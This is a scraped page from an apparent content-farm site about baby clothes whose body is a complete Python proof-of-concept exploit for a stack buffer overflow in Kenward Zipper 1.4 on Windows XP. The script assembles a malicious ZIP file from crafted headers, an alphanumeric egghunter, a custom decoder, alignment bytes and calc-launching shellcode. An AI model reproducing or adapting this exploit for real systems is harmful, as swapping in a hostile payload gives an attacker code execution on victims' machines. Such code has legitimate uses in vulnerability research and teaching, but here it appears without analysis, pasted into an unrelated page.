Funny Baby Clothes - View Content
 Welcome! Funny Baby Clothes - View Contentabout tweets links home 
  
  
  
 Related Tags

Tags on Twitter

  #child
  #clothes
  #funny
  #toddler
  #child trends

What is a Tag?

A 'tag' is a descriptive keyword we use to index our content to help users find it quickly and efficiently!

 [ home ] Baby Clothing that makes you laugh

[ back ]

kenward-zipper.py.txt

article loaded: Sun, 05 Sep 2010 02:40:17 -0400

#!/usr/bin/python
# #################################################################################################
# Exploit Title : Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit
# Date : 23/3/2010
# Bug found by : corelanc0d3r (http://www.corelan.be:8800/)
# Author : mr_me (http://net-ninja.net/)
# Software Link : http://ken-ward-s-zipper.software.informer.com/
# Version : 1.4
# OS : Windows
# Tested on : XP SP3 En
# Greetz to : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
# #################################################################################################
# http://www.abysssec.com/blog/2010/03/ken-ward-zipper-stack-bof-0day-a-not-so-typical-seh-exploit/
print "|------------------------------------------------------------------|"
print "| __ __ |"
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |"
print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |"
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |"
print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |"
print "| |"
print "| http://www.corelan.be:8800 |"
print "| security@corelan.be |"
print "| |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "~~> Kenward zipper v1.4 0day Stack Buffer Overflow PoC exploit <~~"

ldf_header = ("\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00")

#central directory header
cdf_header = ("\x50\x4B\x01\x02\x14\x00\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe4\x0f\x00\x00\x00\x00\x00\x00\x01\x00\x24\x00\x00"
"\x00\x00\x00\x00\x00")

# end of central directory header
eofcdf_header = ("\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00\x02\x10\x00\x00\x00\x00")

# custom decoder
decoder = ("\x25\x4A\x4D\x4E\x55"
"\x25\x35\x32\x31\x2A\x2d\x55\x55"
"\x55\x5f\x2d\x56\x55\x56\x5f\x2d"
"\x55\x55\x55\x5e\x50\x25\x4A\x4D"
"\x4E\x55\x25\x35\x32\x31\x2A\x2d"
"\x2b\x5b\x39\x54\x2d\x2a\x5b\x39"
"\x54\x2d\x2a\x5f\x39\x55\x50")

# ascii egghunter
egghunter= ("JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIQvK1"
"9ZKO6orbv2bJgr2xZmtnulfePZPthoOHbwFPtpbtLKkJLo1eJJloPuKW9okWA");

# shellcode
calc = ("\xd9\xf7\xd9\x74\x24\xf4\x5b\x53\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b"
"\x4c\x4a\x48\x51\x54\x45\x50\x43\x30\x45\x50\x4c\x4b\x51\x55"
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x43\x31\x4a\x4f\x4c"
"\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x45\x51\x4a\x4b"
"\x50\x49\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49"
"\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x42\x54\x44\x47\x49\x51"
"\x49\x5a\x44\x4d\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x50"
"\x54\x47\x54\x45\x54\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x51\x34"
"\x43\x31\x4a\x4b\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51"
"\x4f\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31"
"\x4a\x4b\x4c\x49\x51\x4c\x46\x44\x43\x34\x48\x43\x51\x4f\x50"
"\x31\x4a\x56\x43\x50\x50\x56\x42\x44\x4c\x4b\x50\x46\x50\x30"
"\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c"
"\x4b\x42\x48\x45\x58\x4b\x39\x4a\x58\x4b\x33\x49\x50\x42\x4a"
"\x50\x50\x42\x48\x4c\x30\x4c\x4a\x44\x44\x51\x4f\x45\x38\x4a"
"\x38\x4b\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43"
"\x45\x31\x42\x4c\x43\x53\x46\x4e\x43\x55\x43\x48\x45\x35\x45"
"\x50\x41\x41");

# chasing the stack....
align = "\x61" * 67 + "\x58\x58\x73\xf9"

# ;)
name = "\x6D\x72\x5F\x6D\x65\x73\x5F\x70\x61\x73\x73\x77\x6F"
"\x72\x64\x5F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"

print "[+] Building attack string..."

# my final attack string
exploit = name
exploit += "\x43" * 266
exploit += egghunter
exploit += "\x43" * (878-len(exploit))
exploit += "\x54\x5a"
exploit += decoder
exploit += "\x73\xf9"
exploit += "\x44" * (67-len(decoder))
exploit += "\x73\xf9"
exploit += align
exploit += "\x42" * (1022-len(exploit))
exploit += "\x73\xf9\x41\x41"
exploit += "\x6d\x26\x44\x00"
exploit += "\x57\x30\x30\x54"
exploit += "\x57\x30\x30\x54"
# when the ninja strikes the samurai, the emperor wore no clothes
exploit += calc
exploit += "\x42" * (4064-len(exploit))
exploit += "\x2e\x74\x78\x74"

print "[+] Writing payload to cst-kenzip.zip"
# write the payload
mefile = open('cst-kenzip.zip','w');
mefile.write(ldf_header + exploit + cdf_header + exploit + eofcdf_header);
mefile.close()
print "[+] Exploit file created!!"

[ back ]

Share this content

Comments

There are currently no comments on this post.

  (please enter your name or email address)

 Related Sites

Top Viewed Content

  BP assets seizure by the US a possibility?
  WWII battle site, discovered after nearl...
  Whale Wars is more joke than serious
  Van der Sloot faces hard time in Peruvia...
  Marvin Isley dies at age 56 in Chicago, ...
  North Sea oil rigs will face tougher env...
  Kevin Costner sells waterworld saving oi...
  US Teen sailor missing at sea after dist...
  joomlaarcheryscores-lfi.txt
  Mexican authorities locate mass grave in...

Related Sites

  Wiggle Worm Web Blog
  Infant Clothes
  Baby Clothes
  Child Well Being
  Child Trends
  Baby Toys Dream
  Baby Clothes Blog

Funny Baby Clothes - View Content - © 2010 - All Rights Reserved
Content, Logo's and Trademarks are property of their respective owners

about tweets links home